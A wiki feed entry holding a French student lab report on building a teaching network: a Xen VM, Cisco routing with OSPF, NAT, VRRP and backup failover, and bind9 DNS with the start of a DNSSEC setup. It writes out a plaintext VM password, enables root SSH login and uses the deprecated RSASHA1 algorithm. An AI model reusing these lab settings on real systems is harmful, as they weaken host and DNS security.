<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="fr">
		<id>https://wiki-ima.plil.fr/mediawiki/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Egury</id>
		<title>Wiki d'activités IMA - Contributions de l’utilisateur [fr]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki-ima.plil.fr/mediawiki/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Egury"/>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php/Sp%C3%A9cial:Contributions/Egury"/>
		<updated>2026-09-21T09:39:36Z</updated>
		<subtitle>Contributions de l’utilisateur</subtitle>
		<generator>MediaWiki 1.29.2</generator>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G1&amp;diff=54621</id>
		<title>TP sysres IMA5sc 2020/2021 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G1&amp;diff=54621"/>
				<updated>2020-12-14T16:50:04Z</updated>
		
		<summary type="html">&lt;p&gt;Egury : /* DNS en IPV6 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - Evan Gury &amp;amp; Vincent Dubois - trompettedelamort&lt;br /&gt;
&lt;br /&gt;
Informations générales&lt;br /&gt;
----------------------&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! VLAN privé !! IP (VLAN333) !! Netmask (VLAN333) !! Gateway (VLAN333) !! Gateway 6509-E (VLAN333) !! Gateway 9200 (VLAN333) !! IP (publique)&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| trompettedelamort.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 301&lt;br /&gt;
| 100.64.0.28&lt;br /&gt;
| 255.255.255.0&lt;br /&gt;
| 100.64.0.254&lt;br /&gt;
| 100.64.0.1&lt;br /&gt;
| 100.64.0.2&lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=2  Installation des systèmes d’exploitation (12/10/2020)=&lt;br /&gt;
&lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
 xen-create-image --hostname=trompettedelamort --ip=100.64.0.28 --gateway=100.64.0.2 --netmask=255.255.255.0 --dir=/usr/local/xen --password=pasglop --dist=buster&lt;br /&gt;
&lt;br /&gt;
* Création des disques de stockage sur le serveur de virtualisation (pour tout les binômes):&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton:&lt;br /&gt;
&lt;br /&gt;
** On réquisitionne les deux disques de 2,7To que l'on met dans un groupe&lt;br /&gt;
&lt;br /&gt;
 pvcreate /dev/sde&lt;br /&gt;
 pvcreate /dev/sdf&lt;br /&gt;
 vgcreate storage /dev/sde /dev/sdf&lt;br /&gt;
&lt;br /&gt;
** On créer 2 partitions de 10Go pour chaque binôme:&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n trompettedelamort1 storage&lt;br /&gt;
 lvcreate -L10G -n trompettedelamort2 storage&lt;br /&gt;
 ...meme chose pour chaque groupe...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
** On formate nos partitions:&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/trompettedelamort1&lt;br /&gt;
 mkfs.ext4 /dev/storage/trompettedelamort2&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier de config de la VM (/etc/xen/trompettedelamort.cfg)&lt;br /&gt;
 vif = ['bridge=IMA5sc, ip=100.64.0.84, ...']&lt;br /&gt;
et on indique quel disque utiliser:&lt;br /&gt;
 disk       = [&lt;br /&gt;
               'file:/usr/local/xen/domains/trompettedelamort/disk.img,xvda2,w',&lt;br /&gt;
               'file:/usr/local/xen/domains/trompettedelamort/swap.img,xvda1,w',&lt;br /&gt;
               'phy:/dev/storage/trompettedelamort1,xvda3,w',&lt;br /&gt;
               'phy:/dev/storage/trompettedelamort2,xvda4,w'&lt;br /&gt;
             ]&lt;br /&gt;
&lt;br /&gt;
* Lancer la VM&lt;br /&gt;
 xl create -c /etc/xen/trompettedelamort.cfg&lt;br /&gt;
&lt;br /&gt;
Ensuite, sur la MV:&lt;br /&gt;
&lt;br /&gt;
* Montage et peuplement des partitions:&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
 # /home est vide donc rien a déplacer&lt;br /&gt;
&lt;br /&gt;
puis on démonte:&lt;br /&gt;
 umount /mnt/xvda3&lt;br /&gt;
 umount /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier /etc/fstab pour monter les répertoires '''var''' et '''home''' sur les partitions crées. On ajoute:&lt;br /&gt;
 /dev/xvda3 /home /ext4 default 0 2&lt;br /&gt;
 /dev/xvda4 /var /ext4 default 0 2&lt;br /&gt;
&lt;br /&gt;
et on applique les modification du fichier fstab:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
=3  Architecture réseau=&lt;br /&gt;
&lt;br /&gt;
==3.1  L’architecture générale (12/10/2020)==&lt;br /&gt;
&lt;br /&gt;
La mise en service de l'infrastructure physique (démarrer les routeurs,connexions physiques entre eux et avec le routeur de l'école) a été principalement réalisés par le groupe 14.&lt;br /&gt;
&lt;br /&gt;
==3.2  Les réseaux virtuels (12/10/2020)==&lt;br /&gt;
&lt;br /&gt;
On créer deux VLAN:&lt;br /&gt;
* VLAN131 pour se connecter au routeur de l'école&lt;br /&gt;
* VLAN333 pour accéder aux machines virtuelles sur Capbreton&lt;br /&gt;
&lt;br /&gt;
Cette partie a partiellement été réalisée par le groupe 14 lors de la première séances&lt;br /&gt;
&lt;br /&gt;
==3.5  Interconnexion avec Internet IPv4(15/10/2020 &amp;amp; 02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Le réseau utilisé pour ce TP est le 193.48.57.176/28 (cohabitation avec les IMA2A5 qui ont 193.48.57.160/27). Nous avons donc a notre disposition 16 adresses IP (193.48.57.176 à 193.48.57.191) parmi lesquelles nous devons réserver :&lt;br /&gt;
* 1 adresse pour le réseau&lt;br /&gt;
* 1 adresse de Broadcast&lt;br /&gt;
* 1 adresse pour le routeur 1 (6509-E)&lt;br /&gt;
* 1 adresse pour le routeur 2 (9200)&lt;br /&gt;
* 1 adresse flottante pour les routeurs (redondance)&lt;br /&gt;
Ce qui nous laisse 11 adresses disponibles pour 13 groupes...Impossible&lt;br /&gt;
&lt;br /&gt;
L'idée est donc de créer un sous réseau 10.64.0.16/28 et de faire de de la Translation d'adresse (NAT) vers 193.48.57.176/28&lt;br /&gt;
Nous économisons ainsi les adresses des routeurs et de diffusion qui n'ont pas besoin d’être translatées.&lt;br /&gt;
&lt;br /&gt;
===OSPF===&lt;br /&gt;
L'OSPF permet aux routeurs dans un même domaine d'échanger des informations sur le réseau. Cela permet aux différents routeurs voisins d'avoir de meilleur tables de routages. On réalise donc cette étape sur les deux routeurs pour qu'ils s'echanges leurs tables entre eux mais également avec le routeur de l'école&lt;br /&gt;
&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
&lt;br /&gt;
 ip route 193.48.57.176 255.255.255.0 null0   #Ajout d'une route vers le routeur pour pouvoir ping directement à partir du routeur&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.0.101                                 # un id pour le routeur (plus petite adresse disponible)&lt;br /&gt;
  log-adjacency-changes                                                                                  &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # adresse que l'on souhaite diffuser aux voisins (addresse du VLAN 333)                                                                                                            &lt;br /&gt;
  summary-address 100.60.0.0 255.240.0.0 not-advertise  # address q'on veut pas diffuser (celle du reseau privé)&lt;br /&gt;
  summary-address 10.0.0.0 255.0.0.0 not-advertise      # address q'on veut pas diffuser (?)                                                                                                             &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés   &lt;br /&gt;
  redistribute static subnets                                                                                                                        &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # domaine de diffusion OSPF (Attention au masque inversé)&lt;br /&gt;
&lt;br /&gt;
On peut vérifier le bon fonctonnement avec un ping vers l'adresse globale routeur de l'école&lt;br /&gt;
 ping 193.48.57.48&lt;br /&gt;
&lt;br /&gt;
De plus, on constate de nouvelles routes partagé par le routeur de l'école (&amp;quot;O&amp;quot; au début de la ligne)&lt;br /&gt;
 show ip route&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
On fait la meme chose en changeant le router-id : 10.60.0.102&lt;br /&gt;
&lt;br /&gt;
===NAT===&lt;br /&gt;
On cherche à réaliser une translation d'IP (NAT static) et non une mascarade (injection = NAT Dynamic)&lt;br /&gt;
 ip nat inside source static network 100.64.0.16 193.48.57.176 /28&lt;br /&gt;
Cela permet d'associer les adresse non routées de 100.64.0.16 à 100.64.0.28 aux adresse routées de 193.48.57.176 à 193.48.57.188&lt;br /&gt;
Il faut ensuite indiquer ques sont les VLAN concernés par la translation:&lt;br /&gt;
 int vlan 131&lt;br /&gt;
  ip nat outside&lt;br /&gt;
  exit&lt;br /&gt;
 int  vlan 333&lt;br /&gt;
  ip nat inside&lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
===Problème association OSPF et NAT===&lt;br /&gt;
Il semblerait que l'association de l'OSPF et du NAT soit plus complexe que prévu: les deux fonctionnent bien indépendamment mais pas ensemble. En effet, l'OSPF n'annonce pas les routes vers 100.64.0.16/28 donc aucune communication vers l'exterieur n'est possible.&lt;br /&gt;
&lt;br /&gt;
Pour palier à ce problème, on déclare 100.64.0.0/24 sur VLAN333 et annonce manuellement les routes entre 193.48.57.176 et 100.640.16 (plus de NAT).&lt;br /&gt;
La configuration du 9200 a été faite par M. Redon, on s'occupe du 6509-E :&lt;br /&gt;
 boot&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 no ip address 193.48.57.161 255.255.255.224 #on enleve l'ancienne ip routée&lt;br /&gt;
 ip address 100.64.0.1 255.255.255.0&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
on modifie également l'identifiant de l'ospf 1 qui était en conflit avec celui des IMA2A5:&lt;br /&gt;
 router ospf 1&lt;br /&gt;
 router-id 10.60.100.1&lt;br /&gt;
&lt;br /&gt;
Enfin, on ajoute la route vers notre MV à la main:&lt;br /&gt;
&lt;br /&gt;
 ip route 193.48.57.188 255.255.255.255 100.64.0.28&lt;br /&gt;
&lt;br /&gt;
Puis on configure notre machine virtuelle de manière a ce qu'elle ait les deux IP (100.64.0.28 et 193.48.57.188)(cf. partie suivante). &lt;br /&gt;
&lt;br /&gt;
Les paquets venant de l'extérieur sont propagé à destination de 193.48.57.188 au routeur (6509-E ou 9200) puis vers 100.64.0.28 sur le VLAN333 suivant la route indiquée précédemment. Les paquets émis par notre machine virtuelle sont transmis à la passerelle par défaut (100.64.0.1 si 6509-E ou 100.64.0.2 si 9200) (comme spécifié avec le mot clé &amp;quot;src&amp;quot; lors de l'établissement des routes) puis le routeur connait les routes pour sortir en passant par le routeur de l'école.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==3.6  Interconnexion avec Internet (IPv6)(02/11/2020)==&lt;br /&gt;
Le groupe 14 c'est occupé de configurer le vlan333 pour qu'il utilise des ipv6&lt;br /&gt;
&lt;br /&gt;
On crée le VLAN301 pour notre domaine:&lt;br /&gt;
&lt;br /&gt;
* '''sur 6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 301&lt;br /&gt;
 name trompettedelamort&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 no shutdown&lt;br /&gt;
 ip address 10.60.101.1 255.255.255.0&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60b3::0/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60b3::0/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High #car routeur principale&lt;br /&gt;
&lt;br /&gt;
* '''sur 6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 301&lt;br /&gt;
 name trompettedelamort&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 no shutdown&lt;br /&gt;
 ip address 10.60.101.2 255.255.255.0&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60b3::0/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60b3::0/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference Low&lt;br /&gt;
&lt;br /&gt;
Annonce de route avec RIP fait par groupe 14&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==3.7  Sécurisation du réseau (02/11/2020)==&lt;br /&gt;
En partenariat avec le groupe 14.&lt;br /&gt;
Attention la syntaxe est différente entre le 9200 et le 6509-E&lt;br /&gt;
On configure la redondance avec l'adresse flottante pour les VLAN333 et VLAN1 ainsi que pour le notre VLAN301.&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 vrrp 33 ip 100.64.0.254 # adresse flottante des routeur dans vlan333&lt;br /&gt;
 vrrp 33 preemt # priorité au routeur qui a une priorité supérieur&lt;br /&gt;
 vrrp 33 priority 110 # priorité supérieur a celle du 9200&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 31 ip 10.60.100.254 # adresse flottante des routeur dans vlan333&lt;br /&gt;
 vrrp 31 preemt # priorité au routeur qui a une priorité supérieur&lt;br /&gt;
 vrrp 31 priority 110 # priorité supérieur a celle du 9200&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 41 ip 10.60.101.254 # adresse flottante des routeur dans notre vlan&lt;br /&gt;
 vrrp 41 preemt&lt;br /&gt;
 vrrp 41 priority 110&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 vrrp 33 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 100.64.0.254&lt;br /&gt;
 preemt &lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 1&lt;br /&gt;
 vrrp 31 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 10.60.100.254&lt;br /&gt;
 preemt &lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 41 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 10.60.101.254&lt;br /&gt;
 preemt&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
==3.8  Interconnexion Internet de secours (IPv4) (30/11/2020)==&lt;br /&gt;
(En collaboration avec le groupe 14)&lt;br /&gt;
&lt;br /&gt;
===ISR4331===&lt;br /&gt;
On commcence par connecter l'ISR au boitier SDSL dans le local technique SR52. Pour cela, on repère le port de connexion: &lt;br /&gt;
 SR52# int Gi0/37&lt;br /&gt;
 SR52# switchport mode access&lt;br /&gt;
 SR52# switchport access vlan 531&lt;br /&gt;
&lt;br /&gt;
Puis on configure le nouveau VLAN 531 sur l'ISR (!Attention! sur cet équipement, l'équivalent VLAN est BDI)&lt;br /&gt;
&lt;br /&gt;
 ISR4331# int BDI531&lt;br /&gt;
 ISR4331# ip address 192.168.222.26 255.255.255.248&lt;br /&gt;
 ISR4331# no shut&lt;br /&gt;
 ISR4331# exit  &lt;br /&gt;
 ISR4331# int GigabitEthernet0/0/1 &lt;br /&gt;
 ISR4331# service instance 531 ethernet&lt;br /&gt;
 ISR4331# encapsulation untagged&lt;br /&gt;
 ISR4331# bridge-domain 531&lt;br /&gt;
 ISR4331# exit&lt;br /&gt;
&lt;br /&gt;
On configure également le BDI 333 avec VRRP pour que les VM accède à ce router. Cet équipement aura une priorité VRRP inférieure aux deux autres routeurs car il est destiné a tourner qu'en cas de problème de connexion par le routeur de l'école. &lt;br /&gt;
&lt;br /&gt;
 ISR4331# int BDI 333&lt;br /&gt;
 ISR4331# ip address 100.64.0.3 255.255.255.0&lt;br /&gt;
 ISR4331# vrrp 33 ip 100.64.0.254&lt;br /&gt;
 ISR4331# vrrp 33 preempt&lt;br /&gt;
 ISR4331# vrrp 33 priority 90&lt;br /&gt;
 ISR4331# exit&lt;br /&gt;
&lt;br /&gt;
On y ajoute les ports reliés aux routeurs&lt;br /&gt;
&lt;br /&gt;
 ISR4331# int Gi0/0/0 &lt;br /&gt;
 ISR4331# service instance 333 ethernet&lt;br /&gt;
 ISR4331# encapsulation dot1q 333&lt;br /&gt;
 ISR4331# rewrite ingress tag pop 1 symmetric&lt;br /&gt;
 ISR4331# bridge-domain 333&lt;br /&gt;
 ISR4331# exit&lt;br /&gt;
&lt;br /&gt;
 ISR4331# int Gi0/0/2&lt;br /&gt;
 ISR4331# service instance 333 ethernet&lt;br /&gt;
 ISR4331# encapsulation dot1q 333&lt;br /&gt;
 ISR4331# rewrite ingress tag pop 1 symmetric&lt;br /&gt;
 ISR4331# bridge-domain 333&lt;br /&gt;
 ISR4331# exit&lt;br /&gt;
&lt;br /&gt;
===SLA===&lt;br /&gt;
A ce stade, nos équipement sont connecté mais on ne sait pas quand l'ISR4331 doit prendre la main.&lt;br /&gt;
On utilise le mécanisme SLA pour décrémenter la priorité des routeurs 1 et lorsqu'un incident sur le routeur RENATER (192.168.44.1) est détecté.&lt;br /&gt;
Sur le premier routeur:&lt;br /&gt;
&lt;br /&gt;
 6509-E# ip sla 1&lt;br /&gt;
 6509-E# icmp-echo 192.168.44.1&lt;br /&gt;
 6509-E# frequency 300&lt;br /&gt;
 6509-E# exit&lt;br /&gt;
 6509-E# ip sla schedule 1 life forever start-time now&lt;br /&gt;
 6509-E# track 1 ip sla 1&lt;br /&gt;
 6509-E# exit&lt;br /&gt;
 6509-E# int vlan 333&lt;br /&gt;
 6509-E# vrrp 33 track 1 decrement 50&lt;br /&gt;
 6509-E# exit&lt;br /&gt;
&lt;br /&gt;
Penser a passer le port relié à l'ISR en mode trunk sans quoi on ne poura pas passer d'un VLAN à l'autre&lt;br /&gt;
&lt;br /&gt;
 6509-E# int Te6/5&lt;br /&gt;
 6509-E# switchport trunk encapsulation dot1q&lt;br /&gt;
 6509-E# switchport mode trunk&lt;br /&gt;
 6509-E# exit&lt;br /&gt;
&lt;br /&gt;
On fait la même chose sur le deuxième routeur:&lt;br /&gt;
&lt;br /&gt;
 C9200# ip sla 1&lt;br /&gt;
 C9200# icmp-echo 192.168.44.1&lt;br /&gt;
 C9200# frequency 300&lt;br /&gt;
 C9200# exit&lt;br /&gt;
 C9200# ip sla schedule 1 life forever start-time now&lt;br /&gt;
 C9200# track 1 ip sla 1&lt;br /&gt;
 C9200# exit&lt;br /&gt;
 C9200# int vlan 333&lt;br /&gt;
 C9200# vrrp 33 address-family ipv4&lt;br /&gt;
 C9200# track 1 decrement 50&lt;br /&gt;
 C9200# exit&lt;br /&gt;
&lt;br /&gt;
 C9200# int Gi1/0/2&lt;br /&gt;
 C9200# switchport mode trunk&lt;br /&gt;
 C9200# exit&lt;br /&gt;
 C9200# exit&lt;br /&gt;
&lt;br /&gt;
A présent l'ISR peut prendre le relais si la connexion à internet par le routeur de l'école ne fonctionne plus. &lt;br /&gt;
Il ne reste plus qu'a faire la Mascarade sur l'ISR (IPs VMS -&amp;gt; 1 IP publique du SDLS = NAT dynamique sans pool = Mascarade)&lt;br /&gt;
&lt;br /&gt;
===Mascarade===&lt;br /&gt;
&lt;br /&gt;
 ISR4331# int loopback 0&lt;br /&gt;
 ISR4331# ip address 213.215.6.102 255.255.255.255&lt;br /&gt;
 ISR4331# exit&lt;br /&gt;
 ISR4331# int bdi 531&lt;br /&gt;
 ISR4331# ip nat outside&lt;br /&gt;
 ISR4331# exit&lt;br /&gt;
 ISR4331# int bdi 333&lt;br /&gt;
 ISR4331# ip nat inside&lt;br /&gt;
 ISR4331# exit&lt;br /&gt;
 ISR4331# access-list 33 permit 193.48.57.176 0.0.0.15&lt;br /&gt;
 ISR4331# ip nat inside source list 33 int loopback 0 overload&lt;br /&gt;
 ISR4331# exit&lt;br /&gt;
 ISR4331# ip route 193.48.57.176 255.255.255.255 100.64.0.16&lt;br /&gt;
&lt;br /&gt;
On utilise bien les adresses routés des VM (193.57.48...) et non les adresses privées (100.64....) sinon on serait incapable de revenir vers les VM car le routeur ne connait pas la route vers ces dernières.&lt;br /&gt;
&lt;br /&gt;
===Tests===&lt;br /&gt;
&lt;br /&gt;
On test dans un premier temps la connexion internet. Sur nos VM on remplace la gateway avec l'IP de l'ISR: 100.64.0.3.&lt;br /&gt;
&lt;br /&gt;
Pour tester la prise de relai de l'ISR, on débranche la connexion vers le routeur de l’école des deux routeurs R1 et R2. L'ISR passe bien Master au bout d'un certain temps (&amp;lt;300s).&lt;br /&gt;
&lt;br /&gt;
Il n'est cependant pas possible d’accéder à nos VM depuis cette nouvelle connexion sans que la VM initie la dite connexion. En effet, la mascarade mis en place ne permet pas à l'ISR de router vers l’intérieur, il faudrait utiliser des ports différents pour chaque connexion aux VMs.&lt;br /&gt;
&lt;br /&gt;
==3.9  Interconnexion Internet de secours (IPv6) ()==&lt;br /&gt;
Suite au prochain épisode&lt;br /&gt;
&lt;br /&gt;
=4  Services Internet=&lt;br /&gt;
&lt;br /&gt;
==Connexion a internet (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Afin de mettre internet sur nos machines il faut au préalable modifier le fichier /etc/network/interfaces de nos VM:&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
   auto lo&lt;br /&gt;
   iface lo inet loopback&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
   auto eth0&lt;br /&gt;
   iface eth0 inet static&lt;br /&gt;
   address 193.48.57.188&lt;br /&gt;
   netmask 255.255.255.255&lt;br /&gt;
   up ip address add dev eth0 100.64.0.28/24&lt;br /&gt;
   up ip route add default via 100.64.0.2 src 193.48.57.188&lt;br /&gt;
   down ip address del dev eth0 100.64.0.28/24&lt;br /&gt;
   down ip route del default via 100.64.0.2 src 193.48.57.188&lt;br /&gt;
&lt;br /&gt;
L'adresse 193.48.57.188 correspond à notre adressé routée, l'adresse 100.64.0.28 est notre adresse sur le vlan333 et l'adresse 100.64.0.2 est l'adresse du routeur/commutateur 9200 sur le vlan333.&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite ajouter la route sur le 9200 pour notre VM. Pour se faire on se connecte en ssh sur la zabeth09:&lt;br /&gt;
 ssh pifou@zabet09.plil.info&lt;br /&gt;
Et ensuite via minicom:&lt;br /&gt;
 minicom -os /dev/ttyACM0&lt;br /&gt;
On rentre la commande suivante (apres avoir fait enable et conf t au préalable):&lt;br /&gt;
 ip route 193.48.57.188 255.255.255.255 100.64.0.28 &lt;br /&gt;
&lt;br /&gt;
Nous avons désormais accès à internet sur nos VM et nous pouvons donc maintenant installer bind9 et configurer notre DNS.&lt;br /&gt;
&lt;br /&gt;
==4.1  Serveur SSH (02/11/2020)==&lt;br /&gt;
Le service SSH était activé par defaut.&lt;br /&gt;
Il faut juste autoriser la connexion en root dans le fichier /etc/ssh/sshd_config&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
puis systemctl restart sshd&lt;br /&gt;
&lt;br /&gt;
et on peut se connecter a notre vm&lt;br /&gt;
 ssh root@193.48.57.188&lt;br /&gt;
&lt;br /&gt;
==4.2  Serveur DNS (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Pour commencer dans le fichier de configuration /etc/resolv.conf nous avons mis comme adresse de serveur de nom &lt;br /&gt;
 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
Dans /etc/bind/named.conf.local, en suivant le cours nous avons modifié et/ou ajouté:&lt;br /&gt;
 options{&lt;br /&gt;
 directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
  217.70.177.40/32 ;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ensuite avec bind9 nous avons pu configurer notre serveur de nom.&lt;br /&gt;
Dans le fichier /etc/bind/named.conf.local nous avons défini notre zone &amp;quot;trompettedelamort.site&amp;quot;:&lt;br /&gt;
 zone &amp;quot;trompettedelamort.site&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.trompettedelamort.site&amp;quot;;&lt;br /&gt;
             allow-transfer { 217.70.177.40;};&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
Puis nous avons configuré le fichier db.trompettedelamort.site. Pour se faire nous avons pris le fichier par defaut db.local que nous avons copié puis modifié:&lt;br /&gt;
 zone &amp;quot;trompettedelamort.site&amp;quot; IN {&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.trompettedelamort.site.  postmaster.trompettedelamoo&lt;br /&gt;
 rt.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.trompettedelamort.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.188&lt;br /&gt;
&lt;br /&gt;
Enfin sur gandi.net nous avons crée un glue record dans lequel nous avons mis l'adresse ip de notre machine virtuelle puis nous avons ajouté dans Nameservers. &lt;br /&gt;
ns6.gandi.net possedant déjà son glue record, nous avons simplement ajouté ce dernier dans Nameservers.&lt;br /&gt;
&lt;br /&gt;
==4.3  Sécurisation de site web par certificat (16/11/2020)==&lt;br /&gt;
&lt;br /&gt;
La documentation de ce point est disponible ici https://archives.plil.fr/vdubois-/PRA.git&lt;br /&gt;
&lt;br /&gt;
http://www.trompettedelamort.site/toto.html&lt;br /&gt;
&lt;br /&gt;
==4.4  Sécurisation de serveur DNS par DNSSEC (16/11/2020)==&lt;br /&gt;
&lt;br /&gt;
La configuration a été réalisé en suivant les instructions dans le sujet de TP rubrique : 4.4  Sécurisation de serveur DNS par DNSSEC&lt;br /&gt;
&lt;br /&gt;
Premièrement nous avons modifié le ficher named.conf.options pour y ajouter l'options suivantes:&lt;br /&gt;
 dnssec-enable yes&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite crée un repertoir trompettedelamort.dnssec afin d'y générer les clefs. Nous devons générer une paire de clef KSK et une paire de clef ZSK.&lt;br /&gt;
&lt;br /&gt;
Pour créer la paire de clef KSK, nous utilisons la commande suivante:&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE trompettedelamort.site&lt;br /&gt;
&lt;br /&gt;
Et pour la paire de clef ZSK, nous utilisons la commande suivante:&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -n ZONE trompettedelamort.site&lt;br /&gt;
&lt;br /&gt;
Nous renommons ces paires avec comme prefixe trompettedelamort.site et comme suffice -zsk pour la paire zsk et -ksk pour la paire ksk et nous terminon avec .key pour les clefs publiques et .private pour les clefs privées.&lt;br /&gt;
&lt;br /&gt;
Ensuite dans notre fichier zone db.trompettedelamort.site nous ajoutons les lignes suivantes sans oublier d'incrémenter le  Serial:&lt;br /&gt;
 $include /etc/bind/trompettedelamort.dnssec/trompettedelamort-ksk.key&lt;br /&gt;
 $include /etc/bind/trompettedelamort.dnssec/trompettedelamort-zsk.key&lt;br /&gt;
&lt;br /&gt;
Le fichier db.trompettedelamort.site ressemble donc à cela:&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 @ 	IN	SOA	 ns1.trompettedelamort.site.  postmaster.trompettedelamort.site.(&lt;br /&gt;
 			      8		; Serial&lt;br /&gt;
 			 604800		; Refresh&lt;br /&gt;
 			  86400		; Retry&lt;br /&gt;
 			2419200		; Expire&lt;br /&gt;
 			 604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @	IN	NS	ns1.trompettedelamort.site.&lt;br /&gt;
 @	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @	IN	MX	100 ns1.trompettedelamort.site.&lt;br /&gt;
 ns1	IN	A       193.48.57.188&lt;br /&gt;
 www	IN	A	193.48.57.188	&lt;br /&gt;
 $include /etc/bind/trompettedelamort.site.dnssec/trompettedelamort.site-ksk.key&lt;br /&gt;
 $include /etc/bind/trompettedelamort.site.dnssec/trompettedelamort.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
Nous signons ensuite les enregristrement de la zone avec la commande suivante:&lt;br /&gt;
